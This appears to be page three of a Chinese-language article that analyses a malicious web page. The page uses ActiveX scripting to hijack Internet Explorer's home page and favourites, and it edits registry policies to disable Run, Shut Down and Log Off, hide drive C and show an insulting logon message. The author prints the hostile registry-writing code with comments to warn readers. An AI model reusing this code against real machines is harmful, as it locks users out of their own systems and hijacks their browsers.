進入該網頁會被:
1.修改開始菜單
1)禁止“關閉系統(tǒng)”
2)禁止“運行”
3)禁止“注銷”
2.隱藏C盤——你的C盤找不到了
3.禁止使用注冊表編輯器regedit
4.禁止使用DOS程序
5.使系統(tǒng)無法進入“實模式”
6.禁止運行任何程序
7.將IE瀏覽器的首頁改為http://www.findfeel.com/,收藏夾中也被加入該網址。
那么這些功能恐怖的功能是如何實現(xiàn)的呢?原來,該網頁是有人利用Java技術制作的含有有害代碼的ActiveX網頁文件。為讓更多的人了解其危害,我查看了其源代碼,將其主要部分列了出來,并加了詳細的注釋(文中有“注”字的部分是我加的注釋)。
注:下面代碼是將你的IE默認連接首頁改為http://www.findfeel.com/
Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMainStart Page", "http://www.findfeel.com/");
注:以下是該網頁修改受害者的注冊表項所用的招數
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun", 01, "REG_BINARY");
注:使受害者系統(tǒng)沒有“運行”項,這樣用戶就不能通過注冊表編輯器來修改該有害網頁對系統(tǒng)注冊表的修改。
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose", 01, "REG_BINARY");
注:使受害者系統(tǒng)沒有“關閉系統(tǒng)”項
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff", 01, "REG_BINARY");
注:使受害者系統(tǒng)沒有“注銷”項
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives", "00000004", "REG_DWORD");
注:使受害者系統(tǒng)沒有邏輯驅動器C
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp Disabled","REG_BINARY");
注:禁止運行所有的DOS應用程序;
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies WinOldAppNoRealMode","REG_BINARY");
注:使系統(tǒng)不能啟動到“實模式”(傳統(tǒng)的DOS模式)下;
又注:進入該網頁,它還會修改以下的注冊表項,使WINDOWS系統(tǒng)登錄時顯示一個登錄窗口(在MicroSoft網絡用戶登錄之前)
Shl.RegWrite ("HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption", "嗚啦啦...");
注:這些代碼會使窗口的標題是“嗚啦啦…”
Shl.RegWrite ("HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText", "歡迎你!你這個超級無敵大白癡!《嗚啦啦...》故事開始了,按確定進入悲慘世界");
注:上面一行是會在窗口中顯示出來的文字
注:下面兩行代碼修改注冊表,使受害者所有的IE窗口都加上以下的標題:“嗚啦啦…”
Shl.RegWrite ("HKLMSoftwareMicrosoftInternet ExplorerMainWindow Title", "嗚啦啦..."); Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMainWindow Title", "嗚啦啦...");
注:到上面一行為止,完成了對受害者的注冊表的所有修改!
注:下面代碼用來將其網頁增加到受害者的收藏夾中
var WF, Shor, loc; WF = FSO.GetSpecialFolder(0); loc = WF + "Favorites"; if(!FSO.FolderExists(loc)) { loc = FSO.GetDriveName(WF) + "Documents and Settings" + Net.UserName + "Favorites"; if(!FSO.FolderExists(loc)) { return; } }
注:下面就是使其網頁加入到你的收藏夾的具體代碼
AddFavLnk(loc, "找到感覺www.findfeel.com", http://www.findfeel.com);
本新聞共
6頁,當前在第
3頁
1 2 3 4 5 6